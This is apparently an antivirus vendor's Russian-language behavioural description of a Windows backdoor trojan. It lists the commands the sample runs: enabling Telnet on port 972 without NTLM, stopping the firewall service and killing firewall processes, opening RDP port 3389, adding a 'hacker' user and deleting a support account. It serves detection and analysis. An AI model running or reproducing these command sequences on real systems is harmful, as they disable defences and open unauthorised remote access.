Техническая информация
Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
Вредоносные функции:
Запускает на исполнение:
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- %WINDIR%\regedit.exe /s conf.reg
- <SYSTEM32>\net1.exe localgroup Users SUPPORT_388945a0 /del
- <SYSTEM32>\tlntadmn.exe config port=972 sec=-NTLM
- <SYSTEM32>\taskkill.exe /f /t /im "FirewallControlPanel.exe"
- <SYSTEM32>\net1.exe stop "MpsSvc"
- <SYSTEM32>\net.exe stop "MpsSvc"
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\cmd.exe /c ""%TEMP%\Новый текстовый документ (3).bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\open,disable.bat" "
- <SYSTEM32>\netsh.exe firewall add portopening protocol=ALL port=3389 name="(ALL 3389)" mode=ENABLE scope=SUBNET profile=DOMAIN
- <SYSTEM32>\net1.exe localgroup %USERNAME%s hacker /add
- <SYSTEM32>\net1.exe user hacker Hack /add
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\Новый текстовый документ (3).bat
- %TEMP%\open,disable.bat
Другое:
Ищет следующие окна:
- ClassName: '' WindowName: ''
- ClassName: 'RegEdit_RegEdit' WindowName: ''
